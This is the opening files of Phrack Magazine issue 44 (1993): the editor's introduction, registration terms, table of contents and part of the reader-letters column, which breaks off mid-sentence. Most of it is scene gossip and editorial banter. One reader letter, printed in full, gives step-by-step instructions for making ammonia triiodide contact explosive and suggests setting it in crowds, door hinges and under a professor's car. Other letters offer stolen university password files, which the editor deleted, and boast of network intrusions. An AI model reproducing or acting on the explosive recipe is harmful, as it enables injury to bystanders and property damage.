==Phrack Magazine== Volume Four, Issue Forty-Four, File 1 of 27 Issue 44 Index ___________________ P H R A C K 4 4 November 17, 1993 ___________________ ~ Your skill is extra ordinary ~ Happy Birthday to Phrack, Happy Birthday to Phrack, Happy Birthday Happy Birthday, Happy Birthday to Phrack. November 17th, 1993 marks the eighth year of Phrack Magazine. Amazing, ain't it? Seems like only a few years. Makes me feel old. Damn. I have been a busy boy since I put out 43. I've been to Boston, Amsterdam, Las Vegas, Philadelphia, and numerous points in between. I've been slaving at the day job, consulting and speaking about security on the side, working on other ventures you could not possibly conceive of without proper initiation, and piecing together this magazine. (Listening for applause) It's a big pain in the butt to do a magazine like this, especially when people who SAY they are going to write something, don't. I know, it's a typical hacker cop-out to start something and then get side-tracked by other projects. I'm as guilty of that as is any of you, but I'm trying to get better. So should those of you who are hiding your faces in shame...you know who you are. Every day I get bombarded with "When's the next Phrack coming out?" It started the day I released 43 on IRC. THE SAME DAY! 43 hadn't even gone out over the mailing list yet, and people were already asking when the next one was due out! I know they didn't read all 1.2 megs of 43 before they started in on me. Geez, that gets old. For those of you who ever consider asking me such a thing, the answer is, "When it's done." Alas, still no new corporate registrations. A few people have expressed an interest, but never followed through. We have gotten a number of non-corporate registrations from people who I guess just wanted to send me mail. Listen guys, I love to hear from you all, but unless you are a corporate, federal, or law enforcement reader complying with our registration requirements and paying the fee, you don't have to send in the form. We've got a few nifty things in this issue. Phrack never really included much more than text. Last month's inclusion of the Novell utilities uuencoded was a departure from the norm, and I decided to do somthing like that again. In this issue you will find a small photo collection that might make you smile. If you can't figure out how to use uudecode, I suggest you close this file, and spend a few moments perusing the man page entries on that command, or consulting a good book on unix. And for you whiners that don't have accounts on UNIX boxes, uuencode and uudecode programs are available for DOS, Mac, Amiga and virtually any platform you care to use. (Although if you are using MVS, CICS, TSO or 400/OS, you reap what you sow.) A lot of conferences went on during the time that has passed since our last issue. It's nice to see that the community is making itself a louder voice in the world, although seeing the word "Cyber" on nearly every magazine in the Western Hemisphere is making me rather nauseous, and if Billy Idol gets on another TV show (aside from The Hollywood Squares, which would mean his career was OVER) I may have to sell everything electronic I own. Hell, there was even hacking on Melrose Place. Anyway, back to the point, as is the case with every gathering, we've got it covered. You might notice that there are a lot of files dealing with people and places rather than strictly items of hardcore technical info. I know some may disagree with me, but I really feel that its important to document and chronicle things that relate to the personalities of this community. I mean, how entertaining is it to read "HOW TO HACK TOPS-20" ten years later? Don't get me wrong and think we're not dealing with anything meaty. This issue we've also got operating system guides, cell & bell stuff, Van Eck info, and MORE MORE MORE. Phrack 44. It's out. Now leave me alone. :) ------------------------------------------------------------------------- READ THE FOLLOWING IMPORTANT REGISTRATION INFORMATION Corporate/Institutional/Government: If you are a business, institution or government agency, or otherwise employed by, contracted to or providing any consultation relating to computers, telecommunications or security of any kind to such an entity, this information pertains to you. You are instructed to read this agreement and comply with its terms and immediately destroy any copies of this publication existing in your possession (electronic or otherwise) until such a time as you have fulfilled your registration requirements. A form to request registration agreements is provided at the end of this file. Cost is $100.00 US per user for subscription registration. Cost of multi-user licenses will be negotiated on a site-by-site basis. Individual User: If you are an individual end user whose use is not on behalf of a business, organization or government agency, you may read and possess copies of Phrack Magazine free of charge. You may also distribute this magazine freely to any other such hobbyist or computer service provided for similar hobbyists. If you are unsure of your qualifications as an individual user, please contact us as we do not wish to withhold Phrack from anyone whose occupations are not in conflict with our readership. _______________________________________________________________ Phrack Magazine corporate/institutional/government agreement Notice to users ("Company"): READ THE FOLLOWING LEGAL AGREEMENT. Company's use and/or possession of this Magazine is conditioned upon compliance by company with the terms of this agreement. Any continued use or possession of this Magazine is conditioned upon payment by company of the negotiated fee specified in a letter of confirmation from Phrack Magazine. This magazine may not be distributed by Company to any outside corporation, organization or government agency. This agreement authorizes Company to use and possess the number of copies described in the confirmation letter from Phrack Magazine and for which Company has paid Phrack Magazine the negotiated agreement fee. If the confirmation letter from Phrack Magazine indicates that Company's agreement is "Corporate-Wide", this agreement will be deemed to cover copies duplicated and distributed by Company for use by any additional employees of Company during the Term, at no additional charge. This agreement will remain in effect for one year from the date of the confirmation letter from Phrack Magazine authorizing such continued use or such other period as is stated in the confirmation letter (the "Term"). If Company does not obtain a confirmation letter and pay the applicable agreement fee, Company is in violation of applicable US Copyright laws. This Magazine is protected by United States copyright laws and international treaty provisions. Company acknowledges that no title to the intellectual property in the Magazine is transferred to Company. Company further acknowledges that full ownership rights to the Magazine will remain the exclusive property of Phrack Magazine and Company will not acquire any rights to the Magazine except as expressly set forth in this agreement. Company agrees that any copies of the Magazine made by Company will contain the same proprietary notices which appear in this document. In the event of invalidity of any provision of this agreement, the parties agree that such invalidity shall not affect the validity of the remaining portions of this agreement. In no event shall Phrack Magazine be liable for consequential, incidental or indirect damages of any kind arising out of the delivery, performance or use of the information contained within the copy of this magazine, even if Phrack Magazine has been advised of the possibility of such damages. In no event will Phrack Magazine's liability for any claim, whether in contract, tort, or any other theory of liability, exceed the agreement fee paid by Company. This Agreement will be governed by the laws of the State of Texas as they are applied to agreements to be entered into and to be performed entirely within Texas. The United Nations Convention on Contracts for the International Sale of Goods is specifically disclaimed. This Agreement together with any Phrack Magazine confirmation letter constitute the entire agreement between Company and Phrack Magazine which supersedes any prior agreement, including any prior agreement from Phrack Magazine, or understanding, whether written or oral, relating to the subject matter of this Agreement. The terms and conditions of this Agreement shall apply to all orders submitted to Phrack Magazine and shall supersede any different or additional terms on purchase orders from Company. _________________________________________________________________ REGISTRATION INFORMATION REQUEST FORM We have approximately __________ users. Enclosed is $________ We desire Phrack Magazine distributed by (Choose one): Electronic Mail: _________ Hard Copy: _________ Diskette: _________ (Include size & computer format) Name:_______________________________ Dept:____________________ Company:_______________________________________________________ Address:_______________________________________________________ _______________________________________________________________ City/State/Province:___________________________________________ Country/Postal Code:___________________________________________ Telephone:____________________ Fax:__________________________ Send to: Phrack Magazine 603 W. 13th #1A-278 Austin, TX 78701 ----------------------------------------------------------------------------- Enjoy the magazine. It is for and by the hacking community. Period. Editor-In-Chief : Erik Bloodaxe (aka Chris Goggans) 3L33t : CERT (not) News : Datastream Cowboy Photography : dFx Three People KL Says "Never Trust" : Erik Bloodaxe, Dispater, Control C Dead Guy : River Phoenix Prison Consultant : Co / Dec Gamblers Anonymous : KevinTX Takes Too Long To Make Xeroxes : Count Zero Group To Watch : PoP/FoF Dazed : Weevil Typist : DDS My Hero : Lazlo Toth Thanks To : The Grimmace, Agent 005, Iceman Herd Beast, Al Capone, Synapse, Opticon the Disassembled, Holz, Gurney Halleck, Dark Tangent, Visionary Paco @ Fringeware, VaxBuster Larry Kollar, Sara Gordon, Kohntark, FyberLyte, InterPACT Press, Netsys, The WELL, MOD, Gail, Hack-Tic. "Aitsu, satsu ni tarekondari shitara bukkoroshite yaru!" -- A Paranoid Haiteku-Otaku Phrack Magazine V. 4, #44, November 17, 1993. ISSN 1068-1035 Contents Copyright (C) 1993 Phrack Magazine, all rights reserved. Nothing may be reproduced in whole or in part without written permission of the Editor-In-Chief. Phrack Magazine is made available quarterly to the amateur computer hobbyist free of charge. Any corporate, government, legal, or otherwise commercial usage or possession (electronic or otherwise) is strictly prohibited without prior registration, and is in violation of applicable US Copyright laws. To subscribe, send email to phrack@well.sf.ca.us and ask to be added to the list. Phrack Magazine 603 W. 13th #1A-278 (Phrack Mailing Address) Austin, TX 78701 ftp.netsys.com (Phrack FTP Site) /pub/phrack phrack@well.sf.ca.us (Phrack E-mail Address) Submissions to the above email address may be encrypted with the following key : (Not that we use PGP or encourage its use or anything. Heavens no. That would be politically-incorrect. Maybe someone else is decrypting our mail for us on another machine that isn't used for Phrack publication. Yeah, that's it. :) ) -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.3a mQCNAiuIr00AAAEEAMPGAJ+tzwSTQBjIz/IXs155El9QW8EPyIcd7NjQ98CRgJNy ltY43xMKv7HveHKqJC9KqpUYWwvEBLqlZ30H3gjbChXn+suU18K6V1xRvxgy21qi a4/qpCMxM9acukKOWYMWA0zg+xf3WShwauFWF7btqk7GojnlY1bCD+Ag5Uf1AAUR tCZQaHJhY2sgTWFnYXppbmUgPHBocmFja0B3ZWxsLnNmLmNhLnVzPg== =q2KB -----END PGP PUBLIC KEY BLOCK----- -= Phrack 44 =- Table Of Contents Approx. Size ~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~ 1. Introduction by The Editor 16K 2. Phrack Loopback / Editorial 57K 3. Line Noise Part I 51K 4. Line Noise Part II 35K 5. Computer Cop Prophile by The Grimmace 22K 6. Conference News Part I by Various Sources 55K 7. Conference News Part II by Various Sources 35K 8. Conference News Part III by Various Sources 50K 9. Intro to Packet Radio by Larry Kollar 16K 10. The Moeller Papers 30K 11. Sara Gordon v. Kohntark Part I 12K 12. Sara Gordon v. Kohntark Part II 47K 13. Northern Telecom's FMT-150B/C/D by FyberLyte 16K 14. A Guide to Data General's AOS/VS Part I by Herd Beast 46K 15. A Guide to Data General's AOS/VS Part II by Herd Beast 50K 16. An Interview With Agent Steal by Agent 005 14K 17. Visionary - The Story About Him by Visionary 23K 18. Searching The Dialog Information Service by Al Capone 48K 19. Northern Telecom's SL-1 by Iceman 30K 20. Safe and Easy Carding by VaxBuster 18K 21. Datapac by Synapse 36K 22. An Introduction to the Decserver 200 By Opticon 16K 23. LOD Communications BBS Archive Information 29K 24. MOD Family Portrait 35K 25. Gail Takes A Break 49K 26. International Scenes by Various Sources 25K 27. Phrack World News by Datastream Cowboy 22K Total: 882K People who don't get the picture: "Clipper products may not be usable around the world." (NIST Advisory Board, August, 1993) "Coin stations not served by the TSPS/TOPS ACTS system are subject to considerable fraud and operating expense." (TE&M, p. 58, September 1, 1993) " 'Our basic objective is to detect toll-fraud and prevent customers from suffering large losses,' said AT&T's (Karen) Pepe. 'We're just trying to stay ahead of the curve.'" (Telephony, p. 13, August 30, 1993) People who get the picture: "I don't like things that suck." (Butthead, to Beavis, Every Day, 1993) _______________________________________________________________________________ ==Phrack Magazine== Volume Four, Issue Forty-Four, File 2 of 27 **************************************************************************** Phrack Loopback Hey, Well, Im trying to set up a BBS here in small little old northeast pa, and I'm wondering if there is any way I could post the issues of phrack on it. I've gotten some issues from MindVOX and loved em. Thought others would like em. Please send mail back. the soon to be SySop of LLD. Rebls [I have no problems with people putting copies of Phrack online on bbses for others to download, as long as they stay complete, and as long as you are not charging your users for access to download the files. If you are, you are a business, and if you're planning on making money off of Phrack, you better email me right away. :) ] ------------------------------------------------------------------------------- Control-Alt-Delete INSOC Network Newsletter Information Society is coming back with a harder, more alternative edge. 16 pg magazine format, quarterly, $5. Strongly supported by Kurt Harland, lead singer. Back issues, merchandise available. Issue #3 - October 1. Join the Network! Control-Alt-Delete 5822 Green Terrace Lane Houston, TX 77088-5414 713/448-3815 JBeck@AOL.COM [Here's a plug for a nifty little 'zine. It's amazing how much stuff someone can put out about Information Society. Definitely a must for the hardcore INSoc fan.] ------------------------------------------------------------------------------- I consider myself pretty much an "individual" and an "end user," but I just recently contracted with Mesa State College (of Colorado) to write a simple computer program to organize the tool bin for the vocational technology department. Does this make me a computer consultation contractee of a government, business, or organization? Now that I think of it, the program is designed to keep track of tools so that students don't walk off with them, so that further makes me a "SECURITY computer consultation contractee." Geez. I didn't realize what an important job I had, nor how I am part of the global conspiracy of "computer professionals" to rip people off. Hm. What to do, what to do... Well I guess in the spirit of Phrack magazine, and ignoring the entirely hypocritical and pointless posturing that you have engaged in recently, I will go ahead and read it DESPITE the very sternly worded Copyright Warning which you have so prominently placed in file number one. If you feel that the information presented in Phrack 43 should be kept from certain types of people, and if you are frustrated by the fact that these people seem to be getting access to the information even when you have a LAW against it... Well.. "Tough shit." Bryce [Bryce: The "entirely hypocritical and pointless posturing" that we have engaged in is to prove a point. A point that is obviously "beneath" you as you have missed it entirely. Phrack has been, and always will be free. The copyright notice is to ensure that Phrack is not sold by third parties. The registration notice is only applicable to certain parties whose interests may be opposite those of Phrack Magazine. As you probably realize, it is up to the INDIVIDUAL to decide whether or nor they register. Most corporate/law enforcement/security officials chose not to, hence, they are guilty of the same thing they accuse hackers of. Now, this aside, I think your letter was real shitty, and you came off like a smarmy dickhead. I personally could care less if you read the magazine or wipe your ass with it. Its up to you. The information is provided for EVERYONE to do with whatever the hell the like. If my attitude is contrary to what you feel is "the spirit" of Phrack, well... Tough Shit.] ------------------------------------------------------------------------------- Greetings, After reading/hearing about PHRACK, 2600 and others I was pleased to finally receive the latest issue of Phrack. I have a few questions and suggestions to make: + I have an idea for an article and would like very much to contribute it to Phrack. How do I go about this? Does the article have to be in any particular format? Would it be a good idea to have submission details in every issue? + Is it possible to submit an article to both Phrack and 2600? Would it go against me if I did so? + I have heard of a zine similar to 2600, but specifically for the UK. I think it might be called 2800? Is it still going? And how do I get a hold of or in touch with it? + With regards to your compilation of phone numbers of dialups to universities in the States, I have been trying for a year or so to compile a similar list specifically for the UK. It has been a bit difficult since those lovely people at the JNT dont like this sort of information being compiled. (Despite the fact you can probably walk into any Computer Centre at a site and pick up a free news letter containing such information ;-). Anyway, if any UK readers would like to help me in this task, I would very much appreciate it. And Keep up the good work! [I'll handle all of this in the order you asked: 1) Submissions to phrack can be thru email at our well address phrack@well.sf.ca.us, or can be mailed via US mail to Phrack Magazine, 603 W. 13th #1A-278, Austin, TX, 78701. They don't have to be in any specific format (Style-wise) or on any particular type of media. I can read almost anything for almost any type of computer. 2) You can certainly send your work to both Phrack and 2600. I would ask that if you do so, please indicate it to both myself and Emmanuel Goldstein of 2600 that you have sent it to both magazines. I don't want anyone ragging on me for "ripping of 2600" by publishing something they did, as our schedules are about a month apart. 3) I have never heard of 2800. Perhaps our readers have. 4) I will make sure to forward any UK dialups I get to you for any readers who send them in. I do want to publish your list once you get it compiled though.] ------------------------------------------------------------------------------- I am currently in the final stages of writing my magna thesis in History here at the University of Minnesota. Over the past 6 months or so I have been looking at the whole Neidorf/Riggs fiasco and have decided to do a characterization piece about the Prophet. Bruce Sterling directed me towards you as someone who could give me some personal information on Riggs (His appearance, attitude, and even obscure things such as habits and behaviors). From past experience, I have seen that this information is absolutely necessary in writing these types of "unconventional" histories. Because I have never met the guy or even seen a picture of him, I must rely on people like yourself who may have met him or may know people who have known him. If you can help me by directing me towards people who have known him in the past or currently know him, it would be greatly appreciated. I really don't want to bother Riggs (and even if I did, I probably would not get much out of any encounter). Thanks in advance. Jason W. Esser [I'm sorry, but I really can't help you in that respect. I would suggest you talk to Rob if you want to write about him. Or at a minimum Frank or Adam. They are all very easy to contact. Try directory assistance.] **He writes back** THANKS! You have been EXTREMELY helpful in furthering research into the CU! You are a man of great genius and integrity. Jerk. Jason W. Esser [Jerk? You, a stranger, write me and want to know the details about a friend of mine, without even having the courtesy to let HIM know that you are doing such a thing? What would YOU think if someone out of the fucking blue phoned you up and asked for information about someone you knew, under the guise of some kind of psychological profile, and wanted to know what they looked like, personality quirks, etc... What you are doing has NO RELATIVE MERIT TO THE COMPUTER UNDERGROUND. In fact, I find it intrusive and repulsive. I am not some kind of fucking clearing house for information about people I know. Try his prosecutors for that. Of, if you had any balls at all, you could call Atlanta directory assistance and get phone numbers for Riggs, Darden and Grant. Since you've been such a dick, I suppose I'll call them myself and let them know that someone is trying to get personal information about at least one of them. I'm sure they will be thrilled. So, as for my great genius, you should have asked me questions about UNIX...you would have gotten a much more thorough reply. Asshole.] ------------------------------------------------------------------------------- I would like to make my point in e-mail that I do not wish my program, ISS (Inet Security Scanner), to be in Phrack. Thank you. Christopher William Klaus [I would just like to make my point in e-mail that I do not give a shit about your program ISS (Inet Security Scanner), and it is not going to be in Phrack.] ------------------------------------------------------------------------------- Hello, This message desires an urgent reply-thank you Recently a friend of mind came into some electronic trouble of sorts. I was wondering if it would be possible to obtain a list and an immediate way to contact lawyer(s) who specialize in such cases. Such as the lawyer who represented the infamous E911 case. As you could imagine, time is of essence. Thank you in advance for a quick reply. Shadowvex... [Depending upon where your friend is, and what he/she has done there are a number of people to talk to. If it is a case that may involve issues of constitutionality he should call Mike Godwin at the EFF. (godwin@eff.org) Or may want to contact a local ACLU office. If he just wants to talk to a lawyer who MIGHT offer him some advice on criminal matters he could try Steve Ryan (blivion@zero.cypher.com) Craig Neidorf's lawyer probably would not be interested in taking such a case, unless it would pay him well and was in the Midwest. Remember, if your friend got busted hacking, lawyers aren't going to help much.] ------------------------------------------------------------------------------- I recently learned that when a prank caller calls you on a USDETEST DIRECT telephone all you have to do is hang up the phone and then pick it up again, then hit '*57' and hang up. This logs the prank callers info into the phone company's computer so that if he persists, they have proof of his deeds. After 5-6 prank calls and logging them every time, you may call the phone co. and demand that they give you the prank caller's name, and phone number. You may also have the police notified of the prank caller's address, for severe cases. After 5 logs of the activity, the phone co. is required by law to give you the person's information. We used it when my aunt was getting a silent caller last month. [I hope you know that each time you use the Call-Trace feature you get billed for it. Most modern places have that feature and many of the other custom calling feature upgrades like caller id implemented now a days.] ------------------------------------------------------------------------------- Hey is phrack still alive? Also, do you know the whereabouts of Full Disclosure magazine and Hack-Tic the Dutch magazine? If so do you have the phone number and address to them? Plus, do you know any other mags, that's supports hacker/computer virus (for IBM, MAC, and AMIGA) cracker, anarchy and phreak information? I have the 2600. Are there others our there? [Phrack is still alive. Notice this response. That should be proof. Hack-Tic is easily reached by mailing the editor rop@hacktic.nl Full Disclosure has no phone. Full Disclosure P.O. Box 903 Libertyville, IL 60048 There really aren't any other "hacker" mags. Full Disclosure isn't one by the way. Hack-tic is entirely in Dutch, so unless you speak Dutch it won't do you much good. There are a few mags that kinda cover the whole net scene, like Boing Boing, Gray Areas, etc...there was a big list of cool magazines in the Line Noise section of Phrack 43.] ------------------------------------------------------------------------------- If possible, I'd like to include an ad for my system in Phrack: ][-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-][ Silicon Valley Home of Freedom 2o4-669-7983 Phalcon/Skism Canada cDc Global Domination 1 N0de, 24oo 0nLY! Northern Phun Co. Factury Direct Outlet 2 3l33t for U! Dist. Site S00per 3l33t UUCP Mail (silicon.bison.mb.ca), N0 k0dez, war3z, ansi **** Thousands of the m0st eut1mat3-sp1ffy-krad3st Tf1l3s ar0und! **** Freedom,Phrack,cDc,PHUN,LoD,Cud,NSA,ATI,NIA,ANE,Chaos,uXu,AOTD,Chalisti, CERT,CIAC,DDN,LOL,40HEX,Iformatik,NFX,FBI,NuKE,Phantasy,Worldview,NARC, PPP,Telecom Archives,EFF,DFP,Legal Papers,CPI,Vindicator Productions,DoA, Virii,ource C0de,Scanners,Hackers,Cell Fraud,AWA,UN*X Security/Crackers, Anarkey,ArcV,Trident,Phalcon/Skism,Summercon GIFS,RL,RDT,Syndicate,UPI, Encryption,PGP,Networking,Radio Modification,Virus S0urce,USEnet,Email. The latest news in the hp and telecom community! To apply, type 'apply' at the 'local >' prompt for questions, mail iceman@silicon.bison.mb.ca ][-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-][ ------------------------------------------------------------------------------- Two boys were charged with attempted murder for allegedly stuffing a 3-year-old down a Chicago high-rise building's trash chute, police said. The boys, ages 11 and 13 were charged with aggravated battery and attempted murder. The 3-year-old fell six floors but his fall was broken by a pile of trash. He was rescued by a custodian who saw his feet and turned off a trash compactor just before it would have crushed him, police said. yeah, sign me up. thanks. [I have got to say, this was the weirdest subscription request I've gotten to date.] ------------------------------------------------------------------------------- " To the free flow of information, the life-blood of a prosperous society " By The Philosophical Phreaker (a.k.a King Blutto) Introduction: Don't confuse me with KING BLOTTO in any way... The idea behind my name is -- THe man is gone, but let the legend live on. Univeristy of South Florida <-- One of the easiest target that I have ever come across... The worst security ever. Thanks goes to Hiawatha for some of the information. Just to prevent any loozer from using this information I am not including the address of this particular sight. If you are "mildly" qualified you can find the address... Anywaz, here are some account that I have found using the UNIX password hacker programs. I am also including the password file so all you bad-boyz, can use your 250,000 word dictionaries and beat the crap out of this system. [1500 line /etc/passwd file deleted] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Southern Methodist Univeristy First of all, I must congragulate the operators of this system. There security was "almost" impregnable. With an abundance of traps.. It made attempts to identify its callers, and if it could not identify its callers it would disconnect. This system was a little bit of challenge, I am again including the password file for you'll to hack as many account as you want. Since I don't have an abudance of accounts on this system, I will only give you a hint on how the passwords work. Hint: Most password are like 123 Go for it guyz. [1200 line /etc/passwd file deleted] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Regards: Lex Luthor, The Ozone, Hiawatha, StolenProcess, Mark Zero and all you guyz who were on the The Atmosphere! [Ok, first off, THIS IS NOT SOMETHING TO SUBMIT TO PHRACK. This is something to submit to CERT. What the hell were you thinking? Anyone can get their own fucking password files man. And beyond that, if you still need a password file to get into a system, then you need to go read a few books on tcp/ip. People, please don't send Phrack this kind of bullshit. This piece of mail was about 250K. It was a worthless piece of shit, and only wasted time and energy for everyone involved. And get a new handle. Blotto would probably kick your ass for being so lame and having a handle so close to his. :) ] ------------------------------------------------------------------------------- A warm welcome from across the sea from myself, and I'm sure on behalf of all the other hackers/phreakers who are in Great Britain. After reading about HoHoCon in #42, I would really appreciate it if you could assist me in getting hold of the following: a) When bootleg gave his presentation he handed out a diskette containing information on reprogramming cellular phones... I would dearly love to have a copy of this information. b) Also on the subject of HoHoCon, I would like to get in touch with Jim Carter, or, have a look at any notes/information that he handed out regarding 'tempest' electronic eavesdropping. Thanks, -> The Operator <- [Bootleg's file is called BOOTLEG.ZIP and I'm almost 98% sure that its somewhere on zero.cypher.com's ftp site. If it isn't I'll try to put it there. Jim Carter is in Houston, Texas and can be reached at 713-568-8408 or 7035 Highway 6, S. #120, Houston, TX 77083. Jim didn't really hand anything out at HoHoCon, but if you were to call him, he MIGHT be able to direct you somewhere. He's a good guy, but this is his JOB so don't expect him to give anything away.] ------------------------------------------------------------------------------- 'lo, I was just wondering if there's any way I can subscribe to your 'zine, I can't subscribe through the method in phrack 39 because I send Internet mail through the Cserve - Internet gateway and compuserve can't accept messages with no subject. Also, I'm a Canadian Hacker who's just starting out, and since pretty much all the Hacking BBS's are in the U.S., I need to get into a Sprintnet PAD, and an out dial, so, is there anyway to get a copy of the SprintNet directory phrack 42 which still contains passwords? (fuck, what a leech) {Oh yeah, I miss the explosive recipes from early issues, here's one from my personal collection, you can publish it if you want.} AMMONIA TRIIODE CRYSTALS Chemicals Equipment ~~~~~~~~~ ~~~~~~~~~ 1-Iodine Crystals 1-Funnel & filter paper (coffee filters work pretty well) 2-Clear household Ammonia (or pure ammonia for the clinically insane) 2- 2 glass jars Ammonia Triiode is a blackish crystal which explodes under heat inpact producing a toxic gas which stains everything around it purple (some serious vandalism potential here). WARNING -- be sure to use an ammonia which is impure; crystals made with pure ammonia will explode if touched or in sunlight! 1) Place about two teaspoons of iodine into one of the glass jars and add enough ammonia to completely cover the crystals. 2) Put the paper into the funnel and place the funnel over the other jar. 3) Let the iodine soak in the ammonia for a few minutes (5) and then filter the solution into the other jar. 4) Take the purplish crystals from the filter paper and dry them on a piece of paper towel, separating them into smallish pieces. (you'll probably want to dry them in a cool, dark place which would look good painted a blackish purple, in case the crystals detonate) 8) After the crystals dry gently place each piece onto a square of tape (opaque duct tape or, electrician's tape work best) and put a piece of tape over them. _GENTLY_ press the tape together _AROUND_ the crystal. Once made the crystals will last a week. When detonated they produce a bang and a cloud of gas but no flame. In other words, their perfect for putting on the ground in crowds, in the hinges of your University's doors, in front of the wheels of your favorite professor's car etc. />ragline [Ahhh, sweet destruction. Listen, recipes like this one are very DANGEROUS. Do not attempt to do this. Phrack will take no responsibility for any damages or injuries resulting from anyone constructing the above. About the SprintNet scan...Phrack doesn't publish passwords. If you were any kind of hacker at all, you would enjoy trying to get them yourself. Does your mommie still tuck you in to bed too? About subscribing through CompuServe, I don't know what you may have read in the past, but Phrack has many CompuServe subscribers. Try requesting a subscription. Everything should work out fine.] ------------------------------------------------------------------------------- Hey. I'm an editor of a magazine being put together in Toronto, and I'd like to ask to use your disclaimer. I'll not bore you with the blabberings of how 'el33+e' this mag will be, as I'm sure you just *love* those type of messages. (Note: The mag's called, 'Ban This', if you see it around, I'd appreciate any feedback you can give.) Anyhow, thanks for listening. [Feel free to use the disclaimer. It would be best if you mentioned Phrack somewhere in there as well.] ------------------------------------------------------------------------------- xXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXx IT'S BACK!!!!W$#@$#@$ _-_-_-_-_-_-_ ( ) ( B00m ) ( ) CAU \ / CAU __||___ "We WiLL BloW /---/|_____|\----\ uP YoUr CaR!" /CaU-__WuZ__-HeRe\- (0) (0) fARM R0Ad 666 _ _ PaRt II _ _ ((___)) (713)855-0261 ((___)) [ x x ] [ x x ] \ / cDc SySoP: EighT BaLL \ / cDc (' ') COs: M.C. AllaH (' ') (U) K-C0W F0RCe ChilliN (U) K-C0W F0RCe Nitzer EbB ' CAU HomesitE ' CAU Member SitE ' cDc Factory Direct OutleT(KCF) ' 0b/GyN Member SitE ' Pure Hack/Phreak OrienteD ' Serious Hack/Phreak DiscussionS ' Flashback SoftwarE ' No RatioS ' 24oo-14.4 bpS ' Exophasia Submission SitE(ThP) xXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXx [Call now and watch 8-Ball shoot up!] ------------------------------------------------------------------------------- Digital Highways magazine is an Alternative & Metal Magazine. We Have Reviews of many Local bands from all over USA and National bands. We have Press Releases, Concert Information, National Tours, Local tours, and small tours (small bands) to the large world-wide known bands. Top 10 Music Lists, Information on how to get Free to Really Cheap info. from the music industry. PLUS poetry (alternative) and other info from what's coming out in the stores or who's recording and what not. all of this for $2 for US and Canada (US Funds only) And for Foreign People its 4 dollars Us funds. As my best deal goes.. if you send in a demo tape for review (it must be your band's), or if you send in poetry and we publish it you get one free issue. Demo tape senders get a free issue no matter what, and you always get a review. we have FREE classifieds. All subscribers can get free listing. (we may edit or drop any ad, and we may not publish all ads.) This is the first issue, so send away! to this address rem US/CAN 2$ other 4$ Digital Highways Po Box 38 Troutville,Va 24175 ------------------------------------------------------------------------------- Hi Erik Bloodaxe, I am a student of Computer Science at University of Salerno (South-Italy), near Naples. I have so many copies of Phrack Magazine and I think that You are the Best in the Computer Underground Community. So I leech Your Magazine from many BBS (the ones with the h0ttest H/P/CC Area) like this: +49-58618795 NightBox +46-18262804 EaglesNest +1-5152553212 Down of Immortality (ex Pirate's Ship TRSi/WHQ) ( here there the my friend SysOp Mike Bockert best known a.k.a THE SKELETON / TRSi-TDT ) +1-2018184894 TUGO The UnderGround OASIS ---> ZZC USHQ +598-2-497108 Abn0rmal States +598-2-421996 ( here there is another SysOp friend of mine +598-2-421994 named Alex a.k.a L0neW0lf ) +1-2019394543 Fastrax +1-2019397597 ||| +1-2019398448 ||| +1-2014607022 ||| +1-2014609523 ||| +1-7183975413 The Pit +1-7183975532 ||| +1-7183975520 ||| +1-7183975442 ||| +1-7185074605 ||| +1-3133832116 Pirates Heaven ( The best SysOp I've seen: Nitro) +1-7166554940 The Edge +39-744302593 Temple Of Gurus ( Tecn[0]brains WHQ ) SysOp: POWS/TCB +39-744305366 | | | +39-744305547 | | | +39-238003442 Asylum BBS +39-24500837 Pier BBS Node 0 +39-24582105 ||| Node 1 Excuse me for the awful list (I am on many others BBS too !!!!) and note the my handle is usually _/ane but my real Identity/Handle is PLiNi0 iL VeCCHi0 and the Location I used to write is GReeNiSLaND (because the second-name that usually identify the Island of Ischia where I live with my parents: Ischia is a island located in middle Naples's Bay near the Island of Capri)... so I like to be called as PLiNi0 iL VeCCHi0 / uNiTeD PHReHaCKeRS oF GReeNiSLaND or best -u-.-P-.-G- My best works come in Unix Environment on BSD 4.x , Ultrix , SunOs and Multimax of Encore Corporation: I hacked the Italtel Network, the National Council of Research best known in Italy as C.N.R. or CNR, and many host at University of Naples, Rome, Salerno and Venice... Starting by Italtel Telematica in Milan I was at point of hack the HQ of AT&T in Bruxelles because many users of Italtel Telematica in Milan worked in AT&T too... but to get some examination at University (Like Fisics II and Cibernetica) I must abandon this k()()l work (but I'm interested to restart at AT&T). So in the -= Phrack 42 =- I read this as follow: /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\ |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ In the same number of Phrack Magazine I read about TheNewHacker in North Italy (in Torino) that was interested to get in contact with hackers. Ok, maybe I was a little hacker, but I stay in South Italy ( I am located in Island of Ischia, near Napoli, U know !!!)... Anyway if U can give my E-mail address to TheNewHacker and give me the E-mail of TheNewHacker I will be so glad too... I was interested in contributing to write for a compilation file on the hacking scenes in Italy and France too (I have a friend that works at MATRA-ESPACE for ESA best known as European Spazial Agency located in Toulouse). So lemme known if I can help Your Magazine with my contributions and/or my work. A last thing .... can You, Dear Erik Bloodaxe, give me some Internet address of BBS or FTP Sites with Underground Stuff or any kind of other K()()l stuff ?! (P.S. Can I get Phrack Magazine via FTP at any sites ?!??!) [Hey man, Thanks a lot for the BBS list. I don't really call BBSes much, but I'm sure our readers will get a lot of use out of them! About writing files, GO FOR IT! We always need files. Feel free to send us anything you have written and want to publish! I will forward your info on to TheNewHacker in 